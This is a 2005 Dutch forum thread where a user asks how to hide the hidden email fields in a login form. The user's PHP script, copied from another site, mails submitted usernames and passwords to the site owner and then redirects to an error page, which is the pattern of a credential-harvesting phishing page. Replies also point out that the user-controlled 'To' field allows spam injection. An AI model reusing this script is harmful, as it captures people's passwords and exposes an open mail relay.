[HTML] Code hiden? - Softwareontwikkeling

woensdag 23 november 2005 09:24

Acties:

Verwijderd

Topicstarter

Hallo mensen, ik ben bezig met m'n eigen website.
Mensen kunnen zich registreren, nadat ik een E-Mail van ze heb ontvangen.
Nu heb ik de volgende code, deze is volledig te zien voor mijn bezoekers:

code:

<table width="800" height="547" border="0">
  <tr>
    <td height="177" background="bg.gif">&nbsp;</td>
  </tr>
  <tr>
    <td height="364" background="content.gif"><div align="center" class="style1">
      <form action="" method="post" name="form1" class="style3">
        <input type = 'hidden' name = 'To' value = 'email@email.nl'>
        <input type = 'hidden' name = 'Subject' value = 'Login'>
            Username: 
            <input name="username" type="text" class="style4">
        <br>
        Password: 
        <input name="password" type="password" class="style4"><br>
        <input type="submit" name="login" value="Login">
        </span>
                </form> 
</div></td>
  </tr>
</table>

Nou gaat het mij hier om:

code:

1 2	<input type = 'hidden' name = 'To' value = 'email@email.nl'> <input type = 'hidden' name = 'Subject' value = 'Login'>

Ik wil NIET dat mensen deze tekst zien.
Oftewel, het moet onzichtbaar worden dat mensen weten dat het bericht naar een E-Mail adres toe gaat.
Hoe kan ik dit verbergen?
Of is dit gewoon niet mogelijk?

[ Voor 48% gewijzigd door Verwijderd op 23-11-2005 09:24 ]

woensdag 23 november 2005 09:25

Acties:

frickY

Waarmee ga je de e-mail versturen? Ik neem aan dat je het formulier post naar een andere pagina, waarin je de invoer verwerkt en ook oplsaat in je database? Dat zal waarschijnlijk een PHP, ASP of JSP pagina zijn? Zet daarin de variabele.

woensdag 23 november 2005 09:26

Acties:

Verwijderd

Topicstarter

Ja, dat is i.c.m. een PHP script.

Edit:

PHP:

<?php
session_start ();

include ("include/connection.php");
include ("include/functions.php");
!
$username        = "";
$password        = "";

if($_SERVER['REQUEST_METHOD'] == 'POST')
{
    if(isset($_POST['username']))        { $username = $_POST['username']; }
    if(isset($_POST['password']))        { $password = $_POST['password']; }
    
        $Mail ="
*******************************
$username
$password
*******************************";
    mail ($To, $Subject, $Mail);
    $_SESSION['username'] = $username;
    $_SESSION['password'] = $password;
    header('location: error.php');
    }

?>

Waar zou ik de tekst dan tussen moeten zetten?
Ik heb namelijk totaal geen verstand van PHP (dit script is ook van een andere site gejat

).

[ Voor 93% gewijzigd door Verwijderd op 23-11-2005 09:27 ]

woensdag 23 november 2005 09:27

Acties:

P_de_B

Dit is niet mogelijk, je kunt misschien wat trucjes uithalen maar 100% waterdicht krijg je dat niet op deze manier.

Je kunt er bijvoorbeeld voor kiezen een activiatielink naar hun email te sturen nadat ze zich op je website hebben geregistreerd. Net zoals bijv. GoT dat doet.

Oops! Google Chrome could not find www.rijks%20museum.nl

woensdag 23 november 2005 09:28

Acties:

Verwijderd

Topicstarter

P_de_B schreef op woensdag 23 november 2005 @ 09:27:
Dit is niet mogelijk, je kunt misschien wat trucjes uithalen maar 100% waterdicht krijg je dat niet op deze manier.

Je kunt er bijvoorbeeld voor kiezen een activiatielink naar hun email te sturen nadat ze zich op je website hebben geregistreerd. Net zoals bijv. GoT dat doet.

Dat is helaas niet mogelijk, ik moet echt weten wie er allemaal op de site staan.

woensdag 23 november 2005 09:30

Acties:

djluc

Lees eens in /14 de FAQ over register_globals en de gevaren daarvan. Concreet komt het er op neer dat je:
mail ($To, $Subject, $Mail);
Moet veranderen naar iets als:
mail ('jemail@domein.com', 'jesubject', $_POST['Mail']); <- zie ook $_POST dat heeft te maken met register globals. Lees die FAQ!!

woensdag 23 november 2005 09:30

Acties:

Verwijderd

waarom zet je het mailadres niet gewoon in je php script? Zien mensen het ook niet.

woensdag 23 november 2005 09:34

Acties:

Voutloos

Ik snap echt niet waar je probleem zit. Mensen vullen een form in en daar hoeft helemaal niets over een emailadres gezegd te worden. Serverside kan je de parameters van het form lezen en een mail opmaken naar jezelf.

Je kan gewoon die hidden veldjes weghalen en je mail adres in je php code zetten dus. Heb je er uberhaupt aangedacht wat er gebeurd als ik to="spamdezepersoon@domein.nl" invul? En ja een aanvaller kan dat.

Ik heb namelijk totaal geen verstand van PHP (dit script is ook van een andere site gejat ).

Dan nog mag je je een beetje inlezen. Ook zou ik voortaan je code van andere sites afjatten, want deze code zuigt gigantisch wat betreft security.

[ Voor 41% gewijzigd door Voutloos op 23-11-2005 09:38 ]

{signature}

woensdag 23 november 2005 09:37

Acties:

Calamor

Ik zou eens naar gaan zoeken op internet of een boek kopen om php te leren is niet zo heel erg moeilijk wat je wilt.

woensdag 23 november 2005 09:40

Acties:

Verwijderd

Topicstarter

djluc schreef op woensdag 23 november 2005 @ 09:30:
Lees eens in /14 de FAQ over register_globals en de gevaren daarvan. Concreet komt het er op neer dat je:
mail ($To, $Subject, $Mail);
Moet veranderen naar iets als:
mail ('jemail@domein.com', 'jesubject', $_POST['Mail']); <- zie ook $_POST dat heeft te maken met register globals. Lees die FAQ!!